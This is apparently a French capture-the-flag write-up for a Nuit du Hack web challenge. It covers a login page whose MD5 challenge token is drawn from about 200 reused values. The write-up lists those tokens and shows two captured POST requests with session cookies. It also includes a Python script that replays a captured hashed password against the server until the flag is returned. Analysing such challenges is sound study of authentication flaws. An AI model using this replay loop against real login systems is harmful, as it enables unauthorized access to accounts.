
Zombie Online Massive Game

Overview

On se retrouve face à une page web d'authentification. De plus, l'énoncé nous fournit une capture TCP.

<html>
<head>
<link href="css/style.css" rel="stylesheet" type="text/css">
<title>Zombie Online Massive Game :: Admin</title>
<!-- zomg.js provides zomgDoAuth(), the routine (listed below) that hashes the password client-side before the form is submitted. -->
<script src="zomg.js"></script>
</head>
<body>
 
<!-- Challenge token, served inline as a page global. zomgDoAuth() mixes it into the MD5 answer as "token:username:password". -->
<script>var zomgToken='gc4z6l8smmzhowh8rsj8wkm!!b.sf6fhf-]dlfs3';</script>
<div id="login_form">
	<div id="login_top">
	</div>
	<div id="login_alert">
 
	</div>
	<div id="login_fields">
		<!-- No submit control inside the form: the button below calls zomgDoAuth(), which overwrites #password with the MD5 answer and then submits this form. -->
		<form action="" method="POST">
			<label for="username">Username:</label>
			<input type="text" name="username" id="username"/><br/>
			<label for="password">Password:</label>
			<input type="password" name="password" id="password"/>
		</form>
		<button onclick="javascript:zomgDoAuth()" id="login_button"></button>
	</div>
	<div id="login_bottom"></div>
</div>
</body>
</html>
/* ZOMG JS resources */
 
//var CryptoJS = … — raccourci : la bibliothèque CryptoJS, utilisée ici uniquement pour calculer des hashs MD5
 
/*
 * zomg authenticate hook.
 *
 * Invoked by the login button. Reads the username and password fields and,
 * when both are non-empty, replaces the password field with
 * MD5(zomgToken + ':' + username + ':' + password) and submits the first form
 * on the page. Nothing is submitted when either field is empty.
 *
 * NOTE(review): the "challenge" is the zomgToken value embedded in the page,
 * so the answer is only as fresh as that token; whenever the server hands out
 * the same token again, a previously submitted hash is valid as-is.
 */
function zomgDoAuth() {
	var userField = document.getElementById('username');
	var passField = document.getElementById('password');
	var user = userField.value;
	var pass = passField.value;

	// Guard clause: an empty field means no submission at all.
	if (user.length === 0 || pass.length === 0) {
		return;
	}

	/* compute challenge answer: MD5 over "token:username:password" */
	var answer = CryptoJS.MD5(zomgToken + ':' + user + ':' + pass);

	// The hash (a CryptoJS WordArray, stringified on assignment) replaces the
	// clear-text password, then the first form on the page is submitted.
	passField.value = answer;
	document.forms[0].submit();
}

Analyse de la page

Bref, rien de bien compliqué à comprendre sur la page. Juste avant l'envoi du formulaire, le champ password est remplacé par MD5(token:username:password), où le token est la valeur `zomgToken` injectée directement dans la page (ce n'est pas un cookie) ; puis le formulaire est soumis.

Le token semble aléatoire, mais il n'en est rien : en envoyant quelques requêtes, on se rend compte qu'il n'est tiré que parmi environ 200 valeurs distinctes. Un espace de 200 « challenges » réutilisés, ce n'est pas énorme — et cela signifie qu'une réponse capturée redevient valide dès que le serveur ressert le même token.

Liste des tokens

:r]x]b5bv.,5ao6weahqnaiq-e2a1nqv[3]mlsge
29.,,ndwn4ny8]qeq9m[heu=$[di$dlwozwebn.n
:8,54d9=[6fehbf[m9k48p$psc8:ckh$g9!!2-q1
14ca8qf0:l=k9mg3kb31d8[quulv[vum9n78hs]p
_g=4fvsi5_q6$$:pj6[,84wmzab-4[c4l7,=75.f
8!6:dl=2wfavl$d4j2hu1]9k=6,z3e,1q$2!!mj$
xhcg8p$k![kuy$_y,85gi0.toferm,8l7r[9[36_
jx,=y7c=oz553jiqs=$bc$zonxuqx-omanembq,6
jjyyb.eo-dd47,9uv7fl-03p-$=y688:heb=!lw0
l7d24cpywb81:vqht7q7zu[.emgc=]ojx3f6-ste
s=h!_z!by7pwq5df-r-te:y99ljh].b=2.17]gl,
7n_pialz1h.v]1laosfeeyts.tp1j83d_i3il1z0
:_zul:$u-=]n!!sp[!9klvl]js:rsjipjm!a0!z9
]u2t.q]g:dj0g8rs3[nw3mr-wrx]5--mpqvbvpqa
c_ldo8_.q6pp4][ttu=rf]g7-gy[3q3q49w-qc[$
,ng61jccvx-tr97:63m$vg32lm,psjfp.mtvgb$3
lzum_26073c::tr:$j[]8]2u2_ko!gxibkkar5s$
h$3va=n71i5oiwlhus=j97xggeh=3$n!e:4_e-42
8v:or.ju9ie:g:4scd7v=g3m=b-pig9j$7yu!mfy
kgsqk-1ue5$z5.m.3z54m2uckemzp872me,zsvxn
t9vozvrim0hnx9g0ecc0vy-8bzh_5kjpy6q,neot
uv,$k$roj-ov7x,kx3a4[.rolqd[0b]0skaxp8_m
!z,ns8z8v5.]2]vi9fg9[50213q:it.7y_2ms13:
1y1dk:t.65pb48gju,mej!rd1].h:$dz44vtyest
u,qwmkpojm!agdozdl2jj,noq5lj[q[,g0x=:8u,
tc:rq$9pv-3z:=lp]:q8agmor37m8br2mt8vbrgk
f!g0g[kp,n.4wy!ul49k.]sf2hqd!ed!xjtw1tla
3c!q.h-]e2j5t1xsefj$0sroo2y-1cd5e=2i-1rx
s9,,8x!sv[[]3vrbi6m9b.6k97[$$sfc$6hvqjf3
j8heb9jxjs2ecfbxe5jtjhudff-$p4xy_:f-8ncu
wknxl1uff8-nyo3:nzybozq9m,6f7o=qws4mte7t
x-kp3lct44qt.6fpozfjvx9er:$vz0golj!]ot2w
5bk$n$18.r.tuye6f3ey:c3.$ynvv9yfzmjl,-d-
a]a3r,=-ggo3ml73d:v9i4s6r.b5j2e.v4ef-!a4
[i_,evq5],!1aubm9od6[m49:6a[=pz_gr=-wf5g
-00y4ws4:kxaab-q05x[$dnb=]l5:axjo-$r1_3p
-f6qohip0ql316htxo$=8lb.r[itai=b]!9j0nnw
zuy0a:_ytout8x8lyq28ob4n[o2fz:v1$egvzcvn
o3x]gwtrh,9nx2fu$[ac]nvbvghnw7fpvp[4.=dn
0,nyp.v]c$_881-2a4if0se4ogbco913b8p=z,07
rtukmo2x$zrj!=og4.e9xjjwo-xcygi99-cm9y4_
ro-k=]u2!:b5q-wg_xf]px3w00p_70]pd,pabwoh
z,8-g9s5b4[vhs6572k33!r.9931x7i$!qizo!2h
[t1:1f,5_:jvhz,ygxv]6m7mipd,j.,rna6537oo
agr=twmm955=9zp4d:v8wwca0prkf67d.k_.2],$
kctd28l1wcuqc59=[g7-y,z11wo8-3ub.3_y12wo
3o40[$_]wys[xj43e!2a=6]nygl3u!sg]1twsa!i
9[zz0uu[stu=ch3o4q1eolmvu9][gk[3[0_.7v4d
h3$y2q6qn3$i$m8ipk7al9x1b[fhhmvho]9:szcf
9j9sigb231!8:r9]w_6d-hban7dvpu.oda5z_fqo
r4ru=-,p!xn1rj[kscx1.],qyqx_9ov0fti4su:9
gzygzo2fw3qpz_qffsj$i]h!-gt]7b6!!nx,u-px
:$t2.glh4ce__3=m_79v!2ddunm7c.j-j7q2g:69
f]3p0prqe40s29-9]6nj62uxqz57mbx4d][mv8n-
!m4]bakt]n4c7az,]fzv,,ce8np64mu.jazrqscf
dk7nv:ttf81-z[3r!$oufp]:k3,60j[4=rj6br4o
yy!2=m[w.ml7b!0[q[.aubjvt0.m1d][=_5vpuew
_ycbiop6effran!$_=8[ph7w4ruoy]49zr2=o$:,
8!54zkvgh8i1:u]hz7koj]sts6eu_lensqyzv3a7
p:ixqjtafh:am7g33pr[1puyofu6q6fz=h$kcay3
y-k7j455a3yzku_xacq.$jr[v6cisr-6l34=.id8
.ze2.l=1,i1r,4q4za07hx,aninac7xln0ts8:2n
!nh!08fsp33!has9ij9.a_ontgvul.l1nl=wdu79
ot2pn7gxigo58[p-qqi!ka902y5labo,dx2ppp5d
,ck4ipr0uvf4b49_0[6=$$xxz-s9f8:nzw-yu-eo
s!st![i73rfyx4:1x7j,wu4]hq0p.gbf-h82[6.!
[_hi-uesuhk3oqo:x:af$2dpm4l31ur]_9wk5$kd
.l[nx![]2o6e=$wdflwm3puad5=:ccuf=fr6u=_r
ylyok72:gi4i6[:mne]e5gv.x3lv$x72n-zd!$:$
7:l-i9:w:m5-.s,pbe3lnwm[5aey=,p$p-vkg_4:
pvfd42cx0].5y7l4]owk8vlyc!5s18j,:w10j2i[
l.y$hlvbst0,tjzi47dje-izssger!zxs-8s5a.5
742j7thyb,$![[m]hfo,egfscsyh9vetnh-7u5ig
ac.bp,=8f.318q,qbrqirbct$95mcm51!a!cth,_
1y1]r[l7_iv]t.r0[q2lzwx-mjwehwwch_p[o.!q
terd2yon]klccg6.u:!uf$igk=plqq$k5gk0i$df
!37d,$6hjws7yc!=]oqka__a!1p[t-s!.5u.xhm6
vd$5q=ut=013l=og16x7or1u8.d13nm65l.lg]t-
2m[=:ve=,yi:0[l2t4,fm!_ffajfxkj=$ypp$ut5
jjdi4540u:2y=]$k40sndu]$engeej6-m4_ixjkx
:i6]4qf0gx5ev]rpw-yf6:uq2=g:6f.68rwp9g5w
y$k=5848p3qkx_e$uv$bf:-r]4,n-5nod9cva5f7
0q9y02yrs5493$rjzkxcw8k-4sgc62ww]:qnct93
0r5l=b[j.5f2f]se8,fe_3dsxo!10a2y9[bt6-8w
yq982,ou7e31fp=sacq[d_ju-iw[to8avuudvtdn
!q6ji$:.=4we:=i6i-:oi0dl,ddiur6sh!i-gv$:
hl8,5=[reb8-nhwzhwn3$!t4gb6i9u8q!]bi:3[_
pj8,_0ly!.br9]1c4y_4of[e4c7ziau1h4!m1upg
4.p3bkt[13wd3z2-69njv$cg8.=bf=q8t3[0z4rq
ezmrfmp,39rja3r[un-!q0j[g3ngx3gpaqgob6o[
.y=7=gg02nk030nl1d[,a0z=$llc7jr[znfbefg5
hy:dajlwuv6c45e]du_[ee]4i9[n5qqpc2p-t[ye
u1:ej.l5ga62:==_d,2zwhm$h9i7!qestg2qzifi
jvii$cfuuft=6l5554s0hno,ma24t7jdr..4yme,
t4coxr9i0n4!b0-[q:=dv8rjma1q3w921v=ed:m!
3t5ad50uod.7tz4[ly]ffrov162rn4wr:z==aws]
nng46e5q$gxoth_1h.p.3sl778p=r0y_m[1h!1_u
kzhf7q:1=a5,xbwc3$o17$bu9la.u38cukkbjl=v
[ohien3!jekv-xsgi0jja],34,c8gdi0h5amofcp
9_g$zt_8g=y_jwx.fuo7[jgcn750[t9s8a7!!fpe
0-qhkj$,uooxpdz7t1ut1g,[tjkozuc=774ss.[-
yw80mvp,1vws9zvcy1_$r9w,nw5w,bh-!$etv[a1
:ihnoe3.6d!9eica2sf:$t72ag!gmyfi9tmzaz,y
1z19mv2!6ir-5uh$_pghmuaab0r[.rjjr_sr:ozq
b$]]-b!dhq,ma.hdn5s9th-_i]hixwth]u!6hx1]
4a9$r:]0k13hv5$3dia!5j]l!bx6xk0=vj:y,f71
5cnz,b6sb=jkv6daaz90xo.1i,0m5qwef]s2rrnu
,!wi8!4o4ho.opwp6ip3xh_.l75howd8xues$fsk
2f!=sgj]w=himvaiuy8$j!lmy.nnsl.-2a:up1.s
8z:1kxuxr=r6!]ivd$g-3noh0_$4vri[fznzv]4=
7xmd26r0.!l=n92emhgku04xx8]qn_bn-p,a[ioz
wzluz=p5z]endxsgf4.s]3,5i:dlx$]!22fdhs.y
2-08z]2au!,tkqfobdlmq9i=8gtds13zjo9[u$xp
3nr[um$d!ylc0dfs.g3vt5o4sh5hbyu![bzl:3hp
ot5al4q=yfg7-gra,9bgzn-596pm7p=up!:7twaw
-fymexz,ogwk5_vvlxlv3[5c1n7j332!wgd,k2eq
q8oo0uxsqqfyzlv51xt05ot:b,ngf.cu_m9:jajk
leccoo[,fv3ge4djd$$uor15p4mu3860jg[z!t_j
30w52fzmc$2$mlg$z.8160=jevin$sm_ckth$8qi
opcrumqmh=x3bwzchcnvj9pufs9=bnzd-[f0uw7v
_,.0_[x57=a9lgcedq5bei!7dm:gt4e:8]=kbyfw
$twl9c707v4xfo]=o0-ocg0r6bvs4gsc0hnr[-bp
]!552i-is47z!=c5wk,b-j6oiaj9ilf,fr$iwwz[
gak0etv]w4=]9ia_40y:6c!cgm9dfy.hixx2wfn7
3t.9jp_8e6sowc8lizb3==veruitayokd7uh5uj_
.bnq=axrl45i,mo6aiw-hgoc:e$g9d9=viz.qd7r
03e6:ygce-5:0buvdryoxngngydlyofr7nty46a7
$oz9.d0y[4en,:jk_m,o.7zd6ow0if[9777-2z:n
6sho_d-zb8sb,ew06me7exbx0ym.tmjpx[j=_wiu
g,6,hcn.,pw39iez:5-wf$g_03weuv7ps!e6yxc3
z.=]-1b][p_gp[4o$gt-xj0,b7d]yh33=43-_qvp
n.36!ntk0n0-gi-tlyum7irlq4-j_pp,$fa8m[r3
1a,gbc1:pdv:drol=5klk:-1.iwt-.9vwi_icot[
wgnb,,4g9h0xa08y.pu!vrn7y,ec6inrol39yn[f
mpyyebj3d,zfalpwul,a7odz$kh5j,w.6ug3z.9e
l2]ld=fe[q,!6sor-9_q1u29313-,5eip!j,st2!
w=sx0,fp4ij54tqh7u1vl=3m90!yov[4=z0jwt.h
_q$wiptmc!0gq$rojmxl]i,3jinbui0yg7x1e=_e
j=$bkjl[3m-1jxg,df]9v2616]f-w4g6yxs.ktz5
4e-z86ew477[64oefzn:r:6e8xxq.inwqi8kerg0
m1u1:nmh9x809c8:98qpf.:so-7kobgmgat2lt85
:z$bpqlml[-[f:vxx,9wa5!lm1uplt_9$o2$[7:,
gc4z6l8smmzhowh8rsj8wkm!!b.sf6fhf-]dlfs3
zw93aj:d_nsc]7btu4e!vdwbxsh,xkk1=--fu1l8
,2=3vmjvcu,_ulfi903xiv,-eb3,w6nyz9kx[otq
cay9i:pxmx6,a[is0xer,[[z6.$u065,b:mpyp=,
27=rigbi6s.d7$!d:.b48ev=,n,ta6e..=0n:-c0
bluz.$s1jgnl191aq.12j8rmi[l6_6l_t=o6ho:y
dbzlx_=q-9,3rfo9hd$17,!sdjyixazv-:qz-gc$
rz_l,-i[64[ii.i7!b!mn2_,c]hekb]qvqwll[q1
pu]28jv22.djb!tl,lotx77$119vw$lox]q,qdm8
y41q!a.$i7n5w607.b$cwx241_cqa9$3[b!$,sov
=-3bx:,ryem0zh78xwsml1bdjt-][f1n5.co$c:g
v_ige$kgw04_vd1,:w8xkqttji]dhj238c9d!h.j
477he2c2umakpg.79lu,1u7j[.18ws$!y]_k3[.t
9p$w.k$._izjq2b5-2x!o]_kpmz36qd!wedby:6:
fnpw8vo0fnb[n8ai4jtzsdoc00_:kz-yxeurc:c8
9k3[v_o[b10z1do9va4__5pp4l3]oscobzzk73t3
rw-p6e79pjbr-j1p29r9]6u-dgmchk=hknctgwqv
yspw$2hzg]p=o$-h4z252hybrqs:ax]_l:v1[irt
la=n6g7kh82zl0].ftyai2bh:5hlw-u9=j0[j0af
i4grm[z8jzi_usqzlhk7y_x1s!33p.s[=..eyvrz
2ssb2j.pylijqcr6,,3s6t4i.v8,853h$_4a_q]9
t[yqb8525t:l$j4o03m2obar!s.6798f8cm1qk_f
=d$1wwwsgq[5-vd93bje9233_zn$m[=kw6c!.a]o
nq=lxb7-e2ro4cw_!$0]=,l[93coelr[c5ux9:eg
qawb2-zp4w:i6_!5$i5w!isw[jk4_vcwnzjvwgsy
ur!1fhpyt[-j$obw$z0$rp6f,$e9h1$]6utlz4mh
on7x6=p6fct$:i=qpwp=f]_]_5nwa1a3-fmg:z-w
x--0-dg_w2h,:a!dtqur0:keki__uqsmmsj_2beq
7[p31a:xz]i7,cs]bkysq738_i8d$v5w=3p[wd9d
,ylr1ks7ix._t8=8rsdxm]z-ngciq:t1yub-h0uv
$,6q34puq,x-,wsf$cfrzf3i2g,o1$a,rzlk5oo0
oiejf!jpii1i$7:fu$lld0![,efkp=yfxz=q-3fp
qz2![!wcg__69,y8zf6n:cruzl,c1]bvr:v2kfte
4a2y4u_1!z:l3:uyhe6oasux4]bgev9q[.p:qt3z
f,0oe::v5029o:xupo2rn390aq=e0!t,6romx94c
9.soa]b2u:f5swhx069=pmd=y:pzr53b5p[w-1,a
=-91$fc:$0r35,hm7p=8wyum:tv8cke36ok4wrvh
c,y[,[$z.b:9191r.nu8lk1j6omp!x0rkk3r9mi.
kq_-iryv6$j85=rs30bju17g..!6]rynf_m:ihw8
iyc:xkv]wyzm46.m4l,x=7our]w-f2$n29oagp2]
.9=,hso-wz]i7t9:xx7_,,$n_fga9=3=$,9=tfj1
]hppbkplt9]dtb=:oqcjl:3qr5[bsw958i4rq=a1
-9e,$p1vt:p4!a]3!05,cy=i_g$fethl9=y7u0,-
zqf2$skn6og382q_cz5[pru]uucal,zy7vq3dlv]
z]cp4q$5cll[ysy.tc!2t46a6d$is9$3nf1z-288
.iw-lw2:52p6i6-=x=hy-c_nti99n0lj[ci5-nhz
ryg8k5vgb5ntjy8szc!hf,!uwv,3xszw$51=4,m7
_vt5bj.pu[i]yyx4l[xp7gey1$8et7e2mm9q2v[.
ru=wt_7_[fns900pu3wncf1$hg7!_.3gan1isn9d
g7:g_]5eeo,ye,v15b-9e4ky_fd!:p:8q-m$cwc$
],-oiuflss7boq2xcxq4v76[:0=binhq_moi3c-.
.y!y[y[0_v58r9]waogg5!ar25o[]xdc-hao]a9,
.c$u]2uy24fc-flutzuyxo_zgx80dauls,ks4r[4
,c77gh684$_k]c54c=kn3rkzqo14j[!typztrnza
k!ihoinfa8zvhh_sah][cagr!:]qiqs_u0d7p4:h
ds=f,,bmsyut7j]5q$avh,o777zno,,6]b7k,4c.
09=]e8[b2.yepq5ukgp8wo197rkrh22l4,idqrc]
.jhjk!.z4qoj8m6oeobun:,a7ygw-se$c9uy3cqt

Analyse de la capture TCP

La capture TCP renferme une session TCP vers le site en question. On y trouve deux requêtes HTTP POST distinctes (deux soumissions du formulaire, avec deux mots de passe hashés différents), ainsi qu'une réponse ; seules les requêtes sont reproduites ci-dessous.

POST / HTTP/1.1
Host: public.nuitduhack.com:8009
Origin: http://public.nuitduhack.com:8009
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.22+ (KHTML, like Gecko) Chromium/17.0.963.56 Chrome/17.0.963.56 Safari/535.22+ Epiphany/3.4.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://public.nuitduhack.com:8009/
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SESS0a1ee27932bc06da50674c8c14a5e20b=8qf3fbobdbfrs2g1vs6s1gokc5; SESS2c1a862b4fab9ef42a74fc1be0892571=r4slnc7qd9ihg8tnau1telej60; __utma=114525464.2112388856.1338920171.1340047390.1340053513.8; __utmz=114525464.1340047390.7.2.utmcsr=t.co|utmccn=(referral)|utmcmd=referral|utmcct=/dhGNVGsO; PHPSESSID=2l0loe6li4feofjscuu32ohb54
Content-Length: 56
username=admin&password=1349e61e13325795c02ad26b0ab53dda
POST / HTTP/1.1
Host: public.nuitduhack.com:8009
Origin: http://public.nuitduhack.com:8009
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/535.22+ (KHTML, like Gecko) Chromium/17.0.963.56 Chrome/17.0.963.56 Safari/535.22+ Epiphany/3.4.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://public.nuitduhack.com:8009/
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Cookie: SESS0a1ee27932bc06da50674c8c14a5e20b=8qf3fbobdbfrs2g1vs6s1gokc5; SESS2c1a862b4fab9ef42a74fc1be0892571=r4slnc7qd9ihg8tnau1telej60; __utma=114525464.2112388856.1338920171.1340047390.1340053513.8; __utmz=114525464.1340047390.7.2.utmcsr=t.co|utmccn=(referral)|utmcmd=referral|utmcct=/dhGNVGsO; PHPSESSID=2l0loe6li4feofjscuu32ohb54
Content-Length: 56
username=admin&password=39d7720343ac3430570f202dde3ab803

Première piste (mauvaise piste)

Nous avons environ 200 tokens et deux hashs, dont l'un correspond probablement au mot de passe recherché. On se met donc à brute forcer : comme on ignore quel token a servi pour chaque hash, il faut tester MD5(token:admin:candidat) pour chacun des 200 tokens sur tout l'espace des mots de passe, soit environ 200 fois le coût d'un brute force classique. Après avoir attendu un bon moment sans résultat, on commence à se poser des questions : ce n'est visiblement pas la solution.

Seconde piste (la bonne!)

Toujours avec nos 200 tokens… Finalement, il n'est pas nécessaire de connaître le mot de passe : le hash capturé est une réponse valide pour le token qui l'a produit, et le serveur ne semble lier ce token ni à la session (le script ci-dessous utilise un PHPSESSID différent de celui de la capture) ni à un usage unique. Il suffit donc de rejouer le login et le mot de passe hashé récupérés dans la capture jusqu'à ce que le serveur ressorte le bon token — un challenge-response dont le challenge est réutilisable ne protège pas contre le rejeu. Hop hop hop, on code ça, on laisse tourner environ 2 minutes… et là, oh magie, on obtient le flag :)

#!/usr/bin/env python
# encoding: utf-8
 
import httplib
 
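def main(host="54.247.160.116:8009",
         cookie="PHPSESSID=9p22omkei1cb5517kk93s5ql53;",
         payload="username=admin&password=39d7720343ac3430570f202dde3ab803",
         max_attempts=None):
    """Replay the captured login response until the server accepts it.

    The challenge token is drawn from a small pool (about 200 values, see
    the token list in the write-up), so POSTing the *same* pre-hashed
    password repeatedly eventually lands on a request where the server-side
    token matches the one that produced the captured hash.  A fresh
    connection is opened (and closed) for every attempt so that the server
    gets a chance to issue a new token each time.

    Args:
        host: "host:port" of the target.
        cookie: Cookie header sent with each request.  This is our own
            session, not the one from the capture; the replay succeeding
            anyway suggests the token is not bound to the session
            (inferred from the result, not verified server-side).
        payload: urlencoded form body (username + pre-hashed password) taken
            verbatim from the capture.
        max_attempts: give up after this many requests; None (the default,
            matching the original behaviour) retries without bound.

    Returns:
        The decoded response body containing "Flag", or None when
        max_attempts is exhausted.
    """
    # Local import keeps the function usable on both Python 2 and 3.
    try:
        import httplib
    except ImportError:
        import http.client as httplib

    headers = {"Cookie": cookie,
               "Content-Type": "application/x-www-form-urlencoded"}
    attempt = 0
    while max_attempts is None or attempt < max_attempts:
        attempt += 1
        conn = httplib.HTTPConnection(host)
        try:
            conn.request("POST", "/", payload, headers)
            body = conn.getresponse().read()
        finally:
            # Release the socket explicitly instead of relying on GC.
            conn.close()
        # read() yields str on Python 2 and bytes on Python 3; a bytes
        # literal is a valid operand for both.
        if b"Flag" in body:
            text = body.decode("utf-8", "replace")
            print(text)
            return text
    return None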
 
 
# Run the replay loop only when executed as a script, not on import.
if __name__ == '__main__':
    main()
<html>
<head>
<link href="css/style.css" rel="stylesheet" type="text/css">
<title>Zombie Online Massive Game :: Admin</title>
<script src="zomg.js"></script>
</head>
<body>
 
<div id="login_form">
	<div id="login_top">
	</div>
	<div id="login_alert">
		<!-- Response obtained by the replay script: the flag is rendered in #login_alert. Unlike the login page, this response carries no zomgToken script. -->
		Flag: 8f5741fe00598d1463773708f5743285 
	</div>
	<div id="login_bottom"></div>
</div>
 
</body>
</html>